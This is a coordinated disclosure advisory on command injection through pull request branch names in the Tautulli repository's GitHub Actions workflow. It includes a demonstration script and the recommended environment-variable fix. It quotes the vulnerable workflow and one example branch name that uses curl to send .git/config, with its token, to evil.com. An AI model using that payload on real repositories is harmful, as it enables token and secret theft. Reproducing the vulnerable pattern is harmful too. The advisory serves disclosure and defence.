Coordinated Disclosure Timeline

Summary

The pull-requests.yml GitHub workflow is vulnerable to command injection from a pull request, allowing unauthorized modification of the base repository or exfiltration of its secrets.

Product

Tautulli/Tautulli repository

Tested Version

The latest revision of pull-requests.yml as of the report date.

Details

Issue: A branch name from the pull request is used to format a shell command

Note that the vulnerability exists in multiple branches: a pull_request_target workflow runs from the branch the pull request targets, not from the pull request's head, so every branch that carries this workflow file is affected.

on:
  pull_request_target:
    types: [opened, synchronize, edited, reopened]
...
      - name: Fail Workflow
        if: github.base_ref != 'nightly'
        run: |
          echo Base: ${{ github.base_ref }}
          echo Head: ${{ github.head_ref }}   # PR head branch name, chosen by the PR author and pasted into the script text
          exit 1

Impact

This vulnerability allows arbitrary command injection into the bash script of the Fail Workflow step. ${{ github.head_ref }} is the name of the pull request's source branch, which anyone opening a pull request controls, and the runner substitutes it into the run script as plain text before bash parses it. Because the workflow runs on pull_request_target, the injected commands execute with the base repository's write-enabled GITHUB_TOKEN and with access to the repository's secrets, which allows unauthorized modification of the base repository and secrets exfiltration. For example a PR from a branch named a;${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would exfiltrate the repository token to the attacker controlled server: ${IFS} stands in for spaces, which git does not allow in branch names, and .git/config is where actions/checkout persists the token by default when the elided steps check out the repository.
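The following script is an added example, not code from the advisory or from the Tautulli repository. It reproduces the mechanism on a workstation with a harmless constructed branch name in place of the curl payload: the vulnerable function pastes the branch name into the script text the way the runner expands ${{ github.head_ref }}, and the hardened function passes the same value through an environment variable, which is the fix the GitHub documentation recommends for untrusted expression values in run steps.

```bash
#!/usr/bin/env bash
# Added example (not from the advisory or the Tautulli project).
# The Actions runner replaces ${{ github.head_ref }} with the branch name as
# plain text BEFORE bash parses the run: script, so shell metacharacters in the
# name become shell syntax. This script shows that, and the hardened form.

# Constructed attacker-controlled PR head branch name (stand-in for the curl
# payload in the advisory). ${IFS} replaces spaces, which git does not allow in
# branch names; it expands to whitespace once bash runs the script.
HEAD_REF='a;${IFS}echo${IFS}INJECTED'

# Vulnerable pattern: the value is pasted into the script text, exactly as the
# runner does with `echo Head: ${{ github.head_ref }}`.
run_vulnerable() {
  local script="echo Head: ${HEAD_REF}"   # template expansion happens here
  # bash now parses: echo Head: a;${IFS}echo${IFS}INJECTED
  # The ';' ends the first command and '${IFS}' expands to whitespace, so the
  # attacker's 'echo INJECTED' runs as a second command.
  bash -c "$script"
}

# Hardened pattern: the value reaches the script through the environment and is
# referenced as a quoted variable, so bash treats it as data, never as syntax.
# In a workflow this is `env: { HEAD_REF: ${{ github.head_ref }} }` on the step
# and `echo "Head: $HEAD_REF"` in the run: script.
run_hardened() {
  HEAD_REF="$HEAD_REF" bash -c 'echo "Head: $HEAD_REF"'
}

# Demonstration when run directly.
run_vulnerable   # prints "Head: a" and then "INJECTED": the injected command ran
run_hardened     # prints "Head: a;${IFS}echo${IFS}INJECTED": branch name treated as data
```

The same fix applies to the workflow itself: move the expression out of the run script into an env: entry on the step (for example HEAD_REF: ${{ github.head_ref }}) and reference it as "$HEAD_REF" inside run:, so the untrusted branch name is never spliced into shell source.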

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-016 in any communication regarding this issue.